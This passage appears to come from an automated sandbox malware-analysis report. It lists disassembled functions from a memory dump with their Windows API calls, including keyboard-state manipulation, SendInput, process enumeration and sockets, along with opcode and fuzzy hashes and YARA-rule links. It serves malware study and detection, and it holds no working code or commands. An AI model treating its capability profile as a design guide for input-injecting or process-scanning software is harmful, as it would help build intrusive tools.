                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b971fbe1adb0777ae8110ee1eba588744e7bd8ac2982c2f49a5c80cc02705b02
                                                                                                                                                                                                                                  • Instruction ID: d4674ac7c693f898c5763bc656dabd2c37573416d3ac26c5a7adf4ff62b27da5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b971fbe1adb0777ae8110ee1eba588744e7bd8ac2982c2f49a5c80cc02705b02
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32C12C75A0021AEFDB14CF94C894ABEB7B9FF88714F148598E6059B252D731EE41CB90
                                                                                                                                                                                                                                  Function 009C41F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1036877536-0
                                                                                                                                                                                                                                  • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                  • Instruction ID: 568d592a61af1cae3546cce5d8bca3b8cbef009241f6060e27849f0b3a42a3e1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42A16A71F003869FEB15CF18C8A1FAEBBE8EF91314F2441ADE9959B291C2389D41C752
                                                                                                                                                                                                                                  Function 009F0D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A30BD4,?), ref: 009F0EE0
                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A30BD4,?), ref: 009F0EF8
                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00A2DCE0,000000FF,?,00000000,00000800,00000000,?,00A30BD4,?), ref: 009F0F1D
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 009F0F3E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 314563124-0
                                                                                                                                                                                                                                  • Opcode ID: f10eb0d7620bac7ece07b5fcc5095b1be9612ba53c501042b5ffee7e6e8dab46
                                                                                                                                                                                                                                  • Instruction ID: bfda219639fc3137086103a1f664d3c94eff68244aca3ce63544f9a3048c6dbb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f10eb0d7620bac7ece07b5fcc5095b1be9612ba53c501042b5ffee7e6e8dab46
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF81F975A00109EFCB14DF98C984EEEB7B9FF89315F204558F606AB251DB71AE06CB60
                                                                                                                                                                                                                                  Function 00A1B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00A1B10C
                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00A1B11A
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00A1B1FC
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A1B20B
                                                                                                                                                                                                                                    • Part of subcall function 009AE36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,009D4D73,?), ref: 009AE395
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1991900642-0
                                                                                                                                                                                                                                  • Opcode ID: 5df6f655b9cc24142285510bdc038962730c0d42e391aeff7ad998f850266b3b
                                                                                                                                                                                                                                  • Instruction ID: b1fc4b82068acabfde338ea2dd9f7e06212739d52362134269f99544f9e3674d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5df6f655b9cc24142285510bdc038962730c0d42e391aeff7ad998f850266b3b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50512DB1508300AFD710EF68D886AABBBE8FFC9754F40491DF58997251DB70D905CB92
                                                                                                                                                                                                                                  Function 009D1711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 732198b89db175b42e7b9742f2605c1ec2197193fddfb878085c603f5ef24816
                                                                                                                                                                                                                                  • Instruction ID: 815efc633133b6251f15be4f24d0c4dc89c01e5a60ad3234704789d24c539908
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 732198b89db175b42e7b9742f2605c1ec2197193fddfb878085c603f5ef24816
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA411B33A80104BBDB21AFFD9C85BBE36A9EF85330F14862BF814D73A1DA3549415662
                                                                                                                                                                                                                                  Function 00A12533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00A1255A
                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00A12568
                                                                                                                                                                                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A125E7
                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00A125F1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$socket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1881357543-0
                                                                                                                                                                                                                                  • Opcode ID: f1c50c04e8b4b616d5dc330e7c586b09b0803c143a7ec8a287dde3e69654dd08
                                                                                                                                                                                                                                  • Instruction ID: aea37c98cd29840e4d782f044a6ee9d82eb2df487ac7eeeb013e6089da96fd83
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1c50c04e8b4b616d5dc330e7c586b09b0803c143a7ec8a287dde3e69654dd08
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA41D374A00200AFEB20EF28C886F6677E5EB44758F54C458F9598F2D3D772ED828B90
                                                                                                                                                                                                                                  Function 00A26CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00A26D1A
                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00A26D4D
                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00A26DBA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3880355969-0
                                                                                                                                                                                                                                  • Opcode ID: df53a50cbfa047180e7263a27d76769326baa4811f47f584267f345f594f0fb2
                                                                                                                                                                                                                                  • Instruction ID: 67ca03f0f9d4d1f03b1cc98794b0521baf927c90d948dd1e902106a1a5870158
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: df53a50cbfa047180e7263a27d76769326baa4811f47f584267f345f594f0fb2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32515075A01619EFCF24DF68E880AAE7BB6FF94320F108169F9159B290D770ED91CB50
                                                                                                                                                                                                                                  Function 009CB79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: c5a63c75a5f5d0b88a9c5e4c4b6081e173183052f1161cd789ae6542ab4bd713
                                                                                                                                                                                                                                  • Instruction ID: b0c0d86f0b8fcf961e8ca8ef95fdb3000a7cda67561ec21da1b08f1ab392a7bb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5a63c75a5f5d0b88a9c5e4c4b6081e173183052f1161cd789ae6542ab4bd713
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9541D372E40704AFD725AF78CC42FAABBADEF88710F10852EF511DB291D772A9018781
                                                                                                                                                                                                                                  Function 00A0611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A061C8
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00A061EE
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A06213
                                                                                                                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A0623F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3321077145-0
                                                                                                                                                                                                                                  • Opcode ID: c6f9811f6f20007670d4f2561a6a290835671ec6f32b92d0da6786c102f679b6
                                                                                                                                                                                                                                  • Instruction ID: 5da0d04448dce716f4af2c0c7c019af3e97c4f5e54b366b1e653207390f0ce5f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6f9811f6f20007670d4f2561a6a290835671ec6f32b92d0da6786c102f679b6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7414F35A00610DFCF11EF58C555B5EB7E2EF89714B198488E84A9B3A2CB31FD01CB91
                                                                                                                                                                                                                                  Function 009FB41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 009FB473
                                                                                                                                                                                                                                  • SetKeyboardState.USER32(00000080), ref: 009FB48F
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 009FB4FD
                                                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 009FB54F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                                                                                                  • Opcode ID: 521c388f834584940167dfb0723be16df2d00e7cbda813de1a72e5ec1cde8469
                                                                                                                                                                                                                                  • Instruction ID: 8195b2c19b8e0e1e0f16cd4fcfe1ba940a6fd536af01032832bc285b95430d98
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 521c388f834584940167dfb0723be16df2d00e7cbda813de1a72e5ec1cde8469
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7312870A4025C6EFF30CF69CC057FE7BB9AB59310F14461AF696961E2C37889468761
                                                                                                                                                                                                                                  Function 009FB563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 009FB5B8
                                                                                                                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 009FB5D4
                                                                                                                                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 009FB63B
                                                                                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 009FB68D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                                                                                                                  • Opcode ID: 76067fca07a15aebcd4a33bb4c2d93547fde683c9479977795396928234b48a7
                                                                                                                                                                                                                                  • Instruction ID: 9a23739e7ba04e3ecc8babbcb486c6dd60766d11472fe4f5c28d21dad35120a9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76067fca07a15aebcd4a33bb4c2d93547fde683c9479977795396928234b48a7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3310C70A4064CAEFF30CF65C8057FE7BAAAF85330F14462AE685D61D1C7788A568B51
                                                                                                                                                                                                                                  Function 00A280AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00A280D4
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00A2814A
                                                                                                                                                                                                                                  • PtInRect.USER32(?,?,?), ref: 00A2815A
                                                                                                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 00A281C6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                                                                                                                  • Opcode ID: 213e8bd34c202b912d079c64622e724eb300f2e087f449ab6b3b2d5c1d8592c6
                                                                                                                                                                                                                                  • Instruction ID: 39c2625566880dc609e47517b916aa35dacc3284c21baa3ae15e07a97d31aba8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 213e8bd34c202b912d079c64622e724eb300f2e087f449ab6b3b2d5c1d8592c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4418F31602225DFCB11CF9CE984AA9B7F5BB45310F1442B8F9549B2A1CB78E853CF90
                                                                                                                                                                                                                                  Function 00A22176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00A22187
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009F43AD
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: GetCurrentThreadId.KERNEL32 ref: 009F43B4
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009F2F00), ref: 009F43BB
                                                                                                                                                                                                                                  • GetCaretPos.USER32(?), ref: 00A2219B
                                                                                                                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00A221E8
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00A221EE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2759813231-0
                                                                                                                                                                                                                                  • Opcode ID: 2156fe9539d751d83f732342446fabb77605de44c81ae57faff3167cafc8d431
                                                                                                                                                                                                                                  • Instruction ID: f7fcd5cd5c61ddfe6cec48d1585f6e3077799a699774a4b81cb10c9804e6bf4c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2156fe9539d751d83f732342446fabb77605de44c81ae57faff3167cafc8d431
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 793141B1D01109AFCB04DFA9C881DAEB7F9EF88304B50446AE515E7211DA719E45CBA0
                                                                                                                                                                                                                                  Function 009FE8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009941EA: _wcslen.LIBCMT ref: 009941EF
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FE8E2
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FE8F9
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FE924
                                                                                                                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 009FE92F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
